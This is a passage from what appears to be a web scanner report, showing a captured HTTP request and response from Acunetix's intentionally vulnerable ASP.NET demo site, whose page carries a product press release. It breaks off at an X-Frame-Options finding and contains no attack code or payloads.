MgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

